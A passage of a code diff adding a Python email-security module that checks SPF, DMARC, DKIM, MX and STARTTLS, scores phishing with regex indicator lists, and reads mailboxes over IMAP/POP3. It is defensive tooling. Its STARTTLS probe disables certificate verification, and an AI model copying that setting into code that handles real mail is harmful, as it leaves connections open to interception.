'weight': 15, + }, + 'suspicious_urls': { + 'patterns': [ + r'https?://\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}', # IP-based URLs + r'https?://[^/]*\.(tk|ml|ga|cf|gq|xyz|top|buzz|club|work|click)\b', # suspicious TLDs + r'https?://bit\.ly|tinyurl\.com|goo\.gl|t\.co|is\.gd|shorte\.st', # shorteners + ], + 'weight': 25, + }, + 'brand_impersonation': { + 'patterns': [ + r'\b(paypal|apple|microsoft|google|amazon|facebook|netflix|bank)\b', + ], + 'weight': 10, + }, + 'dangerous_attachments': { + 'patterns': [ + r'\.(exe|scr|bat|cmd|com|pif|vbs|vbe|js|jse|wsf|wsh|ps1|msi|dll)\b', + r'\.(doc|xls|ppt)m\b', # macro-enabled Office + r'\.iso\b|\.img\b|\.hta\b', + ], + 'weight': 30, + }, + 'encoding_tricks': { + 'patterns': [ + r'xn--', # punycode + r'&#\d+;', # HTML entities numeric + r'&#x[0-9a-f]+;', # HTML entities hex + r'=\?[^?]*\?B\?', # Base64 encoded headers + ], + 'weight': 20, + }, +} + +URL_SHORTENER_DOMAINS = { + 'bit.ly', 'tinyurl.com', 'goo.gl', 't.co', 'is.gd', 'shorte.st', + 'ow.ly', 'buff.ly', 'rebrand.ly', 'cutt.ly', 'tiny.cc', 'lnkd.in', + 'rb.gy', 'v.gd', 'qr.ae', 'bl.ink', +} + +SUSPICIOUS_TLDS = { + '.tk', '.ml', '.ga', '.cf', '.gq', '.xyz', '.top', '.buzz', + '.club', '.work', '.click', '.link', '.info', '.biz', '.stream', + '.download', '.win', '.racing', '.review', '.country', '.science', +} + + +# -- Helper ------------------------------------------------------------------ + +def _dns_query(name: str, record_type: str = 'TXT', timeout: int = 5) -> List[str]: + """Query DNS records using nslookup subprocess fallback.""" + results = [] + try: + if record_type == 'TXT': + # Try socket-based approach first for basic lookups + try: + answers = socket.getaddrinfo(name, None) + # socket.getaddrinfo doesn't return TXT — fall through + except Exception: + pass + + # Use nslookup as cross-platform fallback + cmd = ['nslookup', '-type=' + record_type, name] + proc = subprocess.run(cmd, capture_output=True, text=True, timeout=timeout) + output = proc.stdout + 
proc.stderr + + # Parse TXT records from nslookup output + for line in output.split('\n'): + line = line.strip() + if '=' in line and 'text' in line.lower(): + # Format: text = "v=spf1 ..." + txt = line.split('=', 1)[1].strip().strip('"') + results.append(txt) + elif line.startswith('"') and line.endswith('"'): + results.append(line.strip('"')) + elif 'v=spf1' in line or 'v=DMARC1' in line or 'v=DKIM1' in line: + # Sometimes the record is on the line itself + match = re.search(r'"([^"]+)"', line) + if match: + results.append(match.group(1)) + elif 'v=' in line: + # Grab from v= onward + idx = line.index('v=') + results.append(line[idx:].strip().strip('"')) + + elif record_type == 'MX': + cmd = ['nslookup', '-type=MX', name] + proc = subprocess.run(cmd, capture_output=True, text=True, timeout=timeout) + output = proc.stdout + + for line in output.split('\n'): + line = line.strip() + # "mail exchanger = 10 mx1.example.com." + mx_match = re.search(r'mail exchanger\s*=\s*(\d+)\s+(\S+)', line, re.I) + if mx_match: + priority = int(mx_match.group(1)) + host = mx_match.group(2).rstrip('.') + results.append(f"{priority} {host}") + # Also handle "MX preference = 10, mail exchanger = ..." 
+ mx_match2 = re.search(r'preference\s*=\s*(\d+).*exchanger\s*=\s*(\S+)', line, re.I) + if mx_match2: + priority = int(mx_match2.group(1)) + host = mx_match2.group(2).rstrip('.') + results.append(f"{priority} {host}") + + elif record_type in ('A', 'AAAA'): + cmd = ['nslookup', '-type=' + record_type, name] + proc = subprocess.run(cmd, capture_output=True, text=True, timeout=timeout) + output = proc.stdout + + for line in output.split('\n'): + line = line.strip() + addr_match = re.search(r'Address:\s*(\S+)', line) + if addr_match: + addr = addr_match.group(1) + # Skip the DNS server address (first one, usually has #53) + if '#' not in addr and addr != name: + results.append(addr) + + except subprocess.TimeoutExpired: + pass + except FileNotFoundError: + pass + except Exception: + pass + + return results + + +def _reverse_ip(ip: str) -> str: + """Reverse an IPv4 address for DNSBL lookup.""" + parts = ip.split('.') + parts.reverse() + return '.'.join(parts) + + +def _is_valid_ip(s: str) -> bool: + """Check if string is a valid IPv4 address.""" + try: + socket.inet_aton(s) + return True + except (socket.error, OSError): + return False + + +def _resolve_domain(domain: str) -> Optional[str]: + """Resolve a domain to an IPv4 address.""" + try: + return socket.gethostbyname(domain) + except (socket.gaierror, socket.herror): + return None + + +# -- EmailSecurity class ----------------------------------------------------- + +class EmailSecurity: + """Email security analysis engine.""" + + _instance = None + + def __init__(self): + data_dir = get_data_dir() + if isinstance(data_dir, str): + data_dir = Path(data_dir) + self.storage_dir = data_dir / 'email_sec' + self.storage_dir.mkdir(parents=True, exist_ok=True) + self._cache = {} + self._cache_ttl = 300 # 5 minutes + + # -- DNS helper ---------------------------------------------------------- + + def get_dns_record(self, domain: str, record_type: str = 'TXT') -> List[str]: + """Query DNS records for a domain.""" + cache_key 
= f"{record_type}:{domain}" + cached = self._cache.get(cache_key) + if cached and time.time() - cached['ts'] < self._cache_ttl: + return cached['data'] + + results = _dns_query(domain, record_type) + self._cache[cache_key] = {'data': results, 'ts': time.time()} + return results + + # -- SPF ----------------------------------------------------------------- + + def check_spf(self, domain: str) -> Dict[str, Any]: + """Parse and analyze the SPF record for a domain.""" + records = self.get_dns_record(domain, 'TXT') + spf_record = None + for rec in records: + if rec.strip().startswith('v=spf1'): + spf_record = rec.strip() + break + + result = { + 'domain': domain, + 'found': spf_record is not None, + 'record': spf_record or '', + 'mechanisms': [], + 'qualifiers': {}, + 'includes': [], + 'all_policy': 'missing', + 'dns_lookups': 0, + 'findings': [], + 'status': 'fail', + } + + if not spf_record: + result['findings'].append({'level': 'fail', 'message': 'No SPF record found'}) + return result + + # Parse mechanisms + parts = spf_record.split() + lookup_count = 0 + + for part in parts[1:]: # skip v=spf1 + qualifier = '+' + mechanism = part + + if part[0] in '+-~?': + qualifier = part[0] + mechanism = part[1:] + + if mechanism.startswith('ip4:') or mechanism.startswith('ip6:'): + mtype = 'ip4' if mechanism.startswith('ip4:') else 'ip6' + value = mechanism.split(':', 1)[1] + result['mechanisms'].append({'type': mtype, 'value': value, 'qualifier': qualifier}) + elif mechanism.startswith('include:'): + include_domain = mechanism.split(':', 1)[1] + result['includes'].append(include_domain) + result['mechanisms'].append({'type': 'include', 'value': include_domain, 'qualifier': qualifier}) + lookup_count += 1 + elif mechanism.startswith('a:') or mechanism == 'a': + value = mechanism.split(':', 1)[1] if ':' in mechanism else domain + result['mechanisms'].append({'type': 'a', 'value': value, 'qualifier': qualifier}) + lookup_count += 1 + elif mechanism.startswith('mx:') or mechanism 
== 'mx': + value = mechanism.split(':', 1)[1] if ':' in mechanism else domain + result['mechanisms'].append({'type': 'mx', 'value': value, 'qualifier': qualifier}) + lookup_count += 1 + elif mechanism.startswith('ptr'): + result['mechanisms'].append({'type': 'ptr', 'value': mechanism, 'qualifier': qualifier}) + lookup_count += 1 + result['findings'].append({'level': 'warn', 'message': 'PTR mechanism is deprecated (RFC 7208)'}) + elif mechanism.startswith('exists:'): + value = mechanism.split(':', 1)[1] + result['mechanisms'].append({'type': 'exists', 'value': value, 'qualifier': qualifier}) + lookup_count += 1 + elif mechanism.startswith('redirect='): + value = mechanism.split('=', 1)[1] + result['mechanisms'].append({'type': 'redirect', 'value': value, 'qualifier': qualifier}) + lookup_count += 1 + elif mechanism == 'all': + result['all_policy'] = qualifier + qualifier_names = {'+': 'pass', '-': 'hardfail', '~': 'softfail', '?': 'neutral'} + result['mechanisms'].append({'type': 'all', 'value': 'all', 'qualifier': qualifier}) + result['qualifiers']['all'] = qualifier_names.get(qualifier, qualifier) + + result['dns_lookups'] = lookup_count + + # Analyze findings + if result['all_policy'] == '-': + result['findings'].append({'level': 'pass', 'message': 'SPF uses hardfail (-all) — recommended'}) + result['status'] = 'pass' + elif result['all_policy'] == '~': + result['findings'].append({'level': 'warn', 'message': 'SPF uses softfail (~all) — hardfail (-all) recommended'}) + result['status'] = 'warn' + elif result['all_policy'] == '+': + result['findings'].append({'level': 'fail', 'message': 'SPF allows all senders (+all) — anyone can spoof this domain'}) + result['status'] = 'fail' + elif result['all_policy'] == '?': + result['findings'].append({'level': 'warn', 'message': 'SPF uses neutral (?all) — provides no protection'}) + result['status'] = 'warn' + elif result['all_policy'] == 'missing': + result['findings'].append({'level': 'fail', 'message': 'No "all" 
mechanism — implicit +all (no protection)'}) + result['status'] = 'fail' + + if lookup_count > 10: + result['findings'].append({ + 'level': 'fail', + 'message': f'Too many DNS lookups ({lookup_count}) — SPF limit is 10 (RFC 7208)' + }) + elif lookup_count > 7: + result['findings'].append({ + 'level': 'warn', + 'message': f'{lookup_count} DNS lookups — approaching SPF limit of 10' + }) + + if len(result['includes']) > 5: + result['findings'].append({ + 'level': 'warn', + 'message': f'{len(result["includes"])} include directives — consider consolidating' + }) + + return result + + # -- DMARC --------------------------------------------------------------- + + def check_dmarc(self, domain: str) -> Dict[str, Any]: + """Parse and analyze the DMARC record for a domain.""" + dmarc_domain = f'_dmarc.{domain}' + records = self.get_dns_record(dmarc_domain, 'TXT') + dmarc_record = None + for rec in records: + if rec.strip().startswith('v=DMARC1'): + dmarc_record = rec.strip() + break + + result = { + 'domain': domain, + 'found': dmarc_record is not None, + 'record': dmarc_record or '', + 'policy': 'none', + 'subdomain_policy': None, + 'pct': 100, + 'rua': [], + 'ruf': [], + 'aspf': 'r', # relaxed + 'adkim': 'r', # relaxed + 'fo': '0', + 'findings': [], + 'status': 'fail', + } + + if not dmarc_record: + result['findings'].append({'level': 'fail', 'message': 'No DMARC record found'}) + return result + + # Parse tags + tags = {} + for part in dmarc_record.split(';'): + part = part.strip() + if '=' in part: + key, val = part.split('=', 1) + tags[key.strip()] = val.strip() + + result['policy'] = tags.get('p', 'none') + result['subdomain_policy'] = tags.get('sp') + result['pct'] = int(tags.get('pct', '100')) + result['aspf'] = tags.get('aspf', 'r') + result['adkim'] = tags.get('adkim', 'r') + result['fo'] = tags.get('fo', '0') + + if 'rua' in tags: + result['rua'] = [u.strip() for u in tags['rua'].split(',')] + if 'ruf' in tags: + result['ruf'] = [u.strip() for u in 
tags['ruf'].split(',')] + + # Analyze + policy = result['policy'] + if policy == 'reject': + result['findings'].append({'level': 'pass', 'message': 'DMARC policy is "reject" — strongest protection'}) + result['status'] = 'pass' + elif policy == 'quarantine': + result['findings'].append({'level': 'warn', 'message': 'DMARC policy is "quarantine" — "reject" recommended'}) + result['status'] = 'warn' + elif policy == 'none': + result['findings'].append({'level': 'fail', 'message': 'DMARC policy is "none" — no protection (monitoring only)'}) + result['status'] = 'fail' + + if result['pct'] < 100: + result['findings'].append({ + 'level': 'warn', + 'message': f'DMARC pct={result["pct"]}% — only applies to {result["pct"]}% of messages' + }) + + if not result['rua']: + result['findings'].append({'level': 'warn', 'message': 'No aggregate report URI (rua) — no visibility into failures'}) + + if result['subdomain_policy'] and result['subdomain_policy'] != policy: + result['findings'].append({ + 'level': 'warn', + 'message': f'Subdomain policy (sp={result["subdomain_policy"]}) differs from domain policy (p={policy})' + }) + + if result['aspf'] == 'r': + result['findings'].append({'level': 'warn', 'message': 'SPF alignment is relaxed — strict (aspf=s) recommended'}) + if result['adkim'] == 'r': + result['findings'].append({'level': 'warn', 'message': 'DKIM alignment is relaxed — strict (adkim=s) recommended'}) + + return result + + # -- DKIM ---------------------------------------------------------------- + + def check_dkim(self, domain: str, selectors: Optional[List[str]] = None) -> Dict[str, Any]: + """Try common DKIM selectors to find signing keys.""" + if selectors is None: + selectors = COMMON_DKIM_SELECTORS + + result = { + 'domain': domain, + 'found_selectors': [], + 'checked_selectors': selectors, + 'findings': [], + 'status': 'fail', + } + + for selector in selectors: + dkim_domain = f'{selector}._domainkey.{domain}' + records = self.get_dns_record(dkim_domain, 'TXT') + 
+ for rec in records: + if 'v=DKIM1' in rec or 'k=' in rec or 'p=' in rec: + key_info = {'selector': selector, 'record': rec} + + # Parse key fields + tags = {} + for part in rec.split(';'): + part = part.strip() + if '=' in part: + k, v = part.split('=', 1) + tags[k.strip()] = v.strip() + + key_info['version'] = tags.get('v', '') + key_info['key_type'] = tags.get('k', 'rsa') + key_info['public_key'] = tags.get('p', '') + key_info['flags'] = tags.get('t', '') + key_info['hash_algorithms'] = tags.get('h', '') + key_info['notes'] = tags.get('n', '') + + if not tags.get('p'): + key_info['revoked'] = True + result['findings'].append({ + 'level': 'warn', + 'message': f'Selector "{selector}" has empty public key — key may be revoked' + }) + else: + key_info['revoked'] = False + + result['found_selectors'].append(key_info) + break + + if result['found_selectors']: + active = [s for s in result['found_selectors'] if not s.get('revoked')] + if active: + result['status'] = 'pass' + result['findings'].insert(0, { + 'level': 'pass', + 'message': f'Found {len(active)} active DKIM selector(s): {", ".join(s["selector"] for s in active)}' + }) + else: + result['findings'].insert(0, { + 'level': 'warn', + 'message': 'DKIM selectors found but all appear revoked' + }) + else: + result['findings'].append({ + 'level': 'warn', + 'message': f'No DKIM records found for {len(selectors)} common selectors' + }) + + return result + + # -- MX ------------------------------------------------------------------ + + def check_mx(self, domain: str) -> Dict[str, Any]: + """Query MX records and analyze mail servers.""" + mx_records = self.get_dns_record(domain, 'MX') + + result = { + 'domain': domain, + 'mx_records': [], + 'findings': [], + 'status': 'fail', + } + + if not mx_records: + result['findings'].append({'level': 'fail', 'message': 'No MX records found'}) + return result + + result['status'] = 'pass' + + for mx_entry in mx_records: + parts = mx_entry.split(None, 1) + if len(parts) == 2: + 
priority = int(parts[0]) + host = parts[1].rstrip('.') + else: + priority = 0 + host = mx_entry.rstrip('.') + + mx_info = { + 'priority': priority, + 'host': host, + 'ip': _resolve_domain(host), + 'starttls': False, + 'starttls_error': None, + } + + # Check STARTTLS + tls_result = self.check_starttls(host) + mx_info['starttls'] = tls_result.get('starttls', False) + mx_info['starttls_error'] = tls_result.get('error') + mx_info['banner'] = tls_result.get('banner', '') + + if not mx_info['starttls']: + result['findings'].append({ + 'level': 'warn', + 'message': f'MX {host} does not support STARTTLS' + }) + + result['mx_records'].append(mx_info) + + result['mx_records'].sort(key=lambda x: x['priority']) + + if len(result['mx_records']) == 1: + result['findings'].append({ + 'level': 'warn', + 'message': 'Only one MX record — no redundancy for mail delivery' + }) + + all_tls = all(mx['starttls'] for mx in result['mx_records']) + if all_tls: + result['findings'].insert(0, { + 'level': 'pass', + 'message': f'All {len(result["mx_records"])} MX servers support STARTTLS' + }) + + return result + + # -- STARTTLS ------------------------------------------------------------ + + def check_starttls(self, host: str, port: int = 25) -> Dict[str, Any]: + """Check if an SMTP server supports STARTTLS.""" + result = { + 'host': host, + 'port': port, + 'starttls': False, + 'banner': '', + 'tls_version': None, + 'cipher': None, + 'error': None, + } + + try: + sock = socket.create_connection((host, port), timeout=8) + banner = sock.recv(1024).decode('utf-8', errors='replace').strip() + result['banner'] = banner + + # Send EHLO + sock.sendall(b'EHLO autarch.local\r\n') + ehlo_resp = sock.recv(4096).decode('utf-8', errors='replace') + + if 'STARTTLS' in ehlo_resp.upper(): + result['starttls'] = True + + # Try upgrading + sock.sendall(b'STARTTLS\r\n') + tls_resp = sock.recv(1024).decode('utf-8', errors='replace') + + if tls_resp.startswith('220'): + try: + context = 
ssl.create_default_context() + context.check_hostname = False + context.verify_mode = ssl.CERT_NONE + tls_sock = context.wrap_socket(sock, server_hostname=host) + result['tls_version'] = tls_sock.version() + cipher = tls_sock.cipher() + if cipher: + result['cipher'] = cipher[0] + tls_sock.close() + return result + except ssl.SSLError as e: + result['error'] = f'TLS handshake failed: {e}' + + sock.sendall(b'QUIT\r\n') + sock.close() + except socket.timeout: + result['error'] = 'Connection timed out' + except ConnectionRefusedError: + result['error'] = 'Connection refused' + except Exception as e: + result['error'] = str(e) + + return result + + # -- Domain Analysis (full) ---------------------------------------------- + + def analyze_domain(self, domain: str) -> Dict[str, Any]: + """Comprehensive email security analysis for a domain.""" + domain = domain.strip().lower() + + spf = self.check_spf(domain) + dmarc = self.check_dmarc(domain) + dkim = self.check_dkim(domain) + mx = self.check_mx(domain) + + # Calculate overall score + scores = {'pass': 0, 'warn': 0, 'fail': 0} + for check in [spf, dmarc, dkim, mx]: + status = check.get('status', 'fail') + scores[status] = scores.get(status, 0) + 1 + + total = sum(scores.values()) + if total > 0: + score = int(((scores['pass'] * 100) + (scores['warn'] * 50)) / total) + else: + score = 0 + + # Grade + if score >= 90: + grade = 'A' + elif score >= 75: + grade = 'B' + elif score >= 60: + grade = 'C' + elif score >= 40: + grade = 'D' + else: + grade = 'F' + + result = { + 'domain': domain, + 'timestamp': datetime.now(timezone.utc).isoformat(), + 'spf': spf, + 'dmarc': dmarc, + 'dkim': dkim, + 'mx': mx, + 'score': score, + 'grade': grade, + 'summary': { + 'spf_status': spf['status'], + 'dmarc_status': dmarc['status'], + 'dkim_status': dkim['status'], + 'mx_status': mx['status'], + } + } + + # Save analysis + self._save_analysis(domain, result) + return result + + # -- Header Analysis 
----------------------------------------------------- + + def analyze_headers(self, raw_headers: str) -> Dict[str, Any]: + """Parse and analyze email headers for security issues.""" + result = { + 'received_chain': [], + 'authentication': { + 'spf': 'none', + 'dkim': 'none', + 'dmarc': 'none', + }, + 'from': '', + 'return_path': '', + 'reply_to': '', + 'message_id': '', + 'date': '', + 'subject': '', + 'originating_ip': None, + 'spoofing_indicators': [], + 'findings': [], + } + + # Parse with email module + msg = email.message_from_string(raw_headers) + + # Extract basic headers + result['from'] = str(msg.get('From', '')) + result['return_path'] = str(msg.get('Return-Path', '')) + result['reply_to'] = str(msg.get('Reply-To', '')) + result['message_id'] = str(msg.get('Message-ID', '')) + result['date'] = str(msg.get('Date', '')) + result['subject'] = str(msg.get('Subject', '')) + + # Decode encoded headers + for field in ['from', 'subject', 'reply_to']: + val = result[field] + if val and '=?' 
in val: + decoded_parts = email.header.decode_header(val) + decoded = '' + for part, charset in decoded_parts: + if isinstance(part, bytes): + decoded += part.decode(charset or 'utf-8', errors='replace') + else: + decoded += str(part) + result[field] = decoded + + # Parse Received chain + received_headers = msg.get_all('Received', []) + for i, recv in enumerate(received_headers): + hop = {'raw': recv, 'hop': i + 1} + + # Extract from/by + from_match = re.search(r'from\s+(\S+)', recv, re.I) + by_match = re.search(r'by\s+(\S+)', recv, re.I) + if from_match: + hop['from'] = from_match.group(1) + if by_match: + hop['by'] = by_match.group(1) + + # Extract IP + ip_match = re.search(r'\[(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})\]', recv) + if ip_match: + hop['ip'] = ip_match.group(1) + + # Extract timestamp + ts_match = re.search(r';\s*(.+?)$', recv) + if ts_match: + hop['timestamp'] = ts_match.group(1).strip() + + result['received_chain'].append(hop) + + # Originating IP (last Received header — outermost hop) + if result['received_chain']: + for hop in reversed(result['received_chain']): + if hop.get('ip') and not hop['ip'].startswith(('10.', '192.168.', '172.')): + result['originating_ip'] = hop['ip'] + break + + # Parse Authentication-Results + auth_results = msg.get_all('Authentication-Results', []) + for ar in auth_results: + ar_lower = ar.lower() + if 'spf=' in ar_lower: + spf_match = re.search(r'spf=(\w+)', ar_lower) + if spf_match: + result['authentication']['spf'] = spf_match.group(1) + if 'dkim=' in ar_lower: + dkim_match = re.search(r'dkim=(\w+)', ar_lower) + if dkim_match: + result['authentication']['dkim'] = dkim_match.group(1) + if 'dmarc=' in ar_lower: + dmarc_match = re.search(r'dmarc=(\w+)', ar_lower) + if dmarc_match: + result['authentication']['dmarc'] = dmarc_match.group(1) + + # Spoofing indicators + from_addr = result['from'] + return_path = result['return_path'] + reply_to = result['reply_to'] + + # Extract domain from From header + from_domain_match = 
re.search(r'@([\w.-]+)', from_addr) + from_domain = from_domain_match.group(1) if from_domain_match else '' + + rp_domain_match = re.search(r'@([\w.-]+)', return_path) + rp_domain = rp_domain_match.group(1) if rp_domain_match else '' + + if from_domain and rp_domain and from_domain.lower() != rp_domain.lower(): + result['spoofing_indicators'].append({ + 'level': 'warn', + 'indicator': 'From/Return-Path mismatch', + 'detail': f'From domain: {from_domain}, Return-Path domain: {rp_domain}' + }) + + if reply_to: + rt_domain_match = re.search(r'@([\w.-]+)', reply_to) + rt_domain = rt_domain_match.group(1) if rt_domain_match else '' + if from_domain and rt_domain and from_domain.lower() != rt_domain.lower(): + result['spoofing_indicators'].append({ + 'level': 'warn', + 'indicator': 'From/Reply-To mismatch', + 'detail': f'From domain: {from_domain}, Reply-To domain: {rt_domain}' + }) + + # Check authentication failures + for auth_type, auth_result in result['authentication'].items(): + if auth_result == 'fail': + result['findings'].append({ + 'level': 'fail', + 'message': f'{auth_type.upper()} authentication failed' + }) + elif auth_result == 'pass': + result['findings'].append({ + 'level': 'pass', + 'message': f'{auth_type.upper()} authentication passed' + }) + elif auth_result == 'none': + result['findings'].append({ + 'level': 'warn', + 'message': f'No {auth_type.upper()} authentication result' + }) + + # Check for suspicious Received hops + if len(result['received_chain']) > 8: + result['findings'].append({ + 'level': 'warn', + 'message': f'Unusually long Received chain ({len(result["received_chain"])} hops)' + }) + + return result + + # -- Phishing Detection -------------------------------------------------- + + def detect_phishing(self, email_content: str) -> Dict[str, Any]: + """Analyze email content for phishing indicators.""" + result = { + 'risk_score': 0, + 'risk_level': 'low', + 'findings': [], + 'urls_found': [], + 'suspicious_urls': [], + 'attachment_refs': 
[], + } + + content_lower = email_content.lower() + total_weight = 0 + + # Check each indicator category + for category, info in PHISHING_INDICATORS.items(): + category_hits = [] + for pattern in info['patterns']: + matches = re.findall(pattern, content_lower, re.I) + if matches: + category_hits.extend(matches) + + if category_hits: + total_weight += info['weight'] + result['findings'].append({ + 'category': category, + 'severity': 'high' if info['weight'] >= 25 else 'medium' if info['weight'] >= 15 else 'low', + 'matches': list(set(str(m) if isinstance(m, str) else str(m) for m in category_hits[:10])), + 'weight': info['weight'], + }) + + # Extract and analyze URLs + urls = re.findall(r'https?://[^\s<>"\')\]]+', email_content, re.I) + result['urls_found'] = list(set(urls)) + + for url in result['urls_found']: + suspicious_reasons = [] + parsed = urlparse(url) + hostname = parsed.hostname or '' + + # IP-based URL + if _is_valid_ip(hostname): + suspicious_reasons.append('IP-based URL') + + # URL shortener + if hostname.lower() in URL_SHORTENER_DOMAINS: + suspicious_reasons.append('URL shortener') + + # Suspicious TLD + for tld in SUSPICIOUS_TLDS: + if hostname.endswith(tld): + suspicious_reasons.append(f'Suspicious TLD ({tld})') + break + + # Long subdomain (possible typosquatting) + parts = hostname.split('.') + if len(parts) > 4: + suspicious_reasons.append('Excessive subdomains') + + # @-symbol in URL (credential harvesting trick) + if '@' in url: + suspicious_reasons.append('Contains @ symbol (possible credential trick)') + + # Homograph / punycode + if hostname.startswith('xn--'): + suspicious_reasons.append('Punycode/IDN domain') + + if suspicious_reasons: + result['suspicious_urls'].append({ + 'url': url, + 'reasons': suspicious_reasons, + }) + total_weight += 10 + + # Check for attachment references + attachment_exts = re.findall( + r'[\w.-]+\.(exe|scr|bat|cmd|com|pif|vbs|vbe|js|jse|wsf|wsh|ps1|msi|dll|docm|xlsm|pptm|iso|img|hta|lnk|zip|rar|7z)', + 
content_lower + ) + if attachment_exts: + result['attachment_refs'] = list(set(attachment_exts)) + total_weight += 15 + + # Calculate risk score (0-100) + result['risk_score'] = min(100, total_weight) + if result['risk_score'] >= 70: + result['risk_level'] = 'critical' + elif result['risk_score'] >= 50: + result['risk_level'] = 'high' + elif result['risk_score'] >= 30: + result['risk_level'] = 'medium' + else: + result['risk_level'] = 'low' + + return result + + # -- Mailbox Search ------------------------------------------------------ + + def search_mailbox(self, host: str, username: str, password: str, + protocol: str = 'imap', search_query: Optional[str] = None, + folder: str = 'INBOX', use_ssl: bool = True) -> Dict[str, Any]: + """Connect to a mailbox and search for emails.""" + result = { + 'host': host, + 'protocol': protocol, + 'folder': folder, + 'messages': [], + 'total': 0, + 'error': None, + } + + try: + if protocol.lower() == 'imap': + result = self._search_imap(host, username, password, search_query, folder, use_ssl) + elif protocol.lower() == 'pop3': + result = self._search_pop3(host, username, password, search_query, use_ssl) + else: + result['error'] = f'Unsupported protocol: {protocol}' + except Exception as e: + result['error'] = str(e) + + return result + + def _search_imap(self, host: str, username: str, password: str, + search_query: Optional[str], folder: str, use_ssl: bool) -> Dict: + """Search via IMAP.""" + result = {'host': host, 'protocol': 'imap', 'folder': folder, 'messages': [], 'total': 0, 'error': None} + + try: + if use_ssl: + conn = imaplib.IMAP4_SSL(host, timeout=15) + else: + conn = imaplib.IMAP4(host, timeout=15) + + conn.login(username, password) + conn.select(folder, readonly=True) + + # Build search criteria + if search_query: + # Support simple search syntax + criteria = search_query.upper() + if not criteria.startswith('('): + # Wrap simple queries + if '@' in search_query: + criteria = f'(FROM "{search_query}")' + elif 
re.match(r'\d{1,2}-\w{3}-\d{4}', search_query): + criteria = f'(SINCE "{search_query}")' + else: + criteria = f'(SUBJECT "{search_query}")' + else: + criteria = 'ALL' + + status, data = conn.search(None, criteria) + if status != 'OK': + result['error'] = 'Search failed' + conn.logout() + return result + + msg_ids = data[0].split() + result['total'] = len(msg_ids) + + # Fetch last 50 message summaries + for msg_id in msg_ids[-50:]: + status, msg_data = conn.fetch(msg_id, '(RFC822.SIZE BODY[HEADER.FIELDS (FROM SUBJECT DATE MESSAGE-ID)])') + if status == 'OK' and msg_data[0]: + header_data = msg_data[0][1] if isinstance(msg_data[0], tuple) else msg_data[0] + if isinstance(header_data, bytes): + header_data = header_data.decode('utf-8', errors='replace') + + msg = email.message_from_string(header_data) + size = 0 + # Try to get size from FETCH response + if isinstance(msg_data[0], tuple): + size_match = re.search(r'RFC822\.SIZE\s+(\d+)', str(msg_data[0][0])) + if size_match: + size = int(size_match.group(1)) + + summary = { + 'id': msg_id.decode() if isinstance(msg_id, bytes) else str(msg_id), + 'from': str(msg.get('From', '')), + 'subject': str(msg.get('Subject', '')), + 'date': str(msg.get('Date', '')), + 'message_id': str(msg.get('Message-ID', '')), + 'size': size, + } + + # Decode encoded headers + for field in ['from', 'subject']: + if summary[field] and '=?' 
in summary[field]: + try: + decoded_parts = email.header.decode_header(summary[field]) + decoded = '' + for part, charset in decoded_parts: + if isinstance(part, bytes): + decoded += part.decode(charset or 'utf-8', errors='replace') + else: + decoded += str(part) + summary[field] = decoded + except Exception: + pass + + result['messages'].append(summary) + + conn.logout() + except imaplib.IMAP4.error as e: + result['error'] = f'IMAP error: {e}' + except Exception as e: + result['error'] = str(e) + + return result + + def _search_pop3(self, host: str, username: str, password: str, + search_query: Optional[str], use_ssl: bool) -> Dict: + """Search via POP3 (limited — retrieves headers of recent messages).""" + result = {'host': host, 'protocol': 'pop3', 'folder': 'INBOX', 'messages': [], 'total': 0, 'error': None} + + try: + if use_ssl: + conn = poplib.POP3_SSL(host, timeout=15) + else: + conn = poplib.POP3(host, timeout=15) + + conn.user(username) + conn.pass_(password) + + count, size = conn.stat() + result['total'] = count + + # Fetch last 50 messages' headers + start = max(1, count - 49) + query_lower = search_query.lower() if search_query else None + + for i in range(start, count + 1): + resp, lines, octets = conn.top(i, 0) + header_text = b'\r\n'.join(lines).decode('utf-8', errors='replace') + msg = email.message_from_string(header_text) + + summary = { + 'id': str(i), + 'from': str(msg.get('From', '')), + 'subject': str(msg.get('Subject', '')), + 'date': str(msg.get('Date', '')), + 'message_id': str(msg.get('Message-ID', '')), + 'size': octets, + } + + # Apply client-side filter + if query_lower: + match = (query_lower in summary['from'].lower() or + query_lower in summary['subject'].lower()) + if not match: + continue + + result['messages'].append(summary) + + conn.quit() + except Exception as e: + result['error'] = str(e) + + return result + + # -- Fetch Full Email ---------------------------------------------------- + + def fetch_email(self, host: str, 
username: str, password: str, + message_id: str, protocol: str = 'imap', + use_ssl: bool = True) -> Dict[str, Any]: + """Fetch a complete email by message ID.""" + result = {'message_id': message_id, 'raw_headers': '', 'body': '', 'attachments': [], 'error': None} + + try: + if protocol.lower() == 'imap': + if use_ssl: + conn = imaplib.IMAP4_SSL(host, timeout=15) + else: + conn = imaplib.IMAP4(host, timeout=15) + + conn.login(username, password) + conn.select('INBOX', readonly=True) + + status, data = conn.fetch(message_id.encode() if isinstance(message_id, str) else message_id, + '(RFC822)') + if status == 'OK' and data[0]: + raw = data[0][1] if isinstance(data[0], tuple) else data[0] + if isinstance(raw, bytes): + raw = raw.decode('utf-8', errors='replace') + + msg = email.message_from_string(raw) + + # Headers + header_keys = ['From', 'To', 'Cc', 'Subject', 'Date', 'Message-ID', + 'Return-Path', 'Reply-To', 'Received', + 'Authentication-Results', 'DKIM-Signature', + 'X-Mailer', 'X-Originating-IP'] + headers_text = '' + for key in header_keys: + vals = msg.get_all(key, []) + for v in vals: + headers_text += f'{key}: {v}\n' + result['raw_headers'] = headers_text + + # Body + if msg.is_multipart(): + for part in msg.walk(): + ct = part.get_content_type() + cd = str(part.get('Content-Disposition', '')) + + if 'attachment' in cd: + result['attachments'].append({ + 'filename': part.get_filename() or 'unknown', + 'content_type': ct, + 'size': len(part.get_payload(decode=True) or b''), + }) + elif ct == 'text/plain': + payload = part.get_payload(decode=True) + if payload: + result['body'] = payload.decode('utf-8', errors='replace') + elif ct == 'text/html' and not result['body']: + payload = part.get_payload(decode=True) + if payload: + result['body'] = payload.decode('utf-8', errors='replace') + else: + payload = msg.get_payload(decode=True) + if payload: + result['body'] = payload.decode('utf-8', errors='replace') + + conn.logout() + + elif protocol.lower() == 'pop3': 
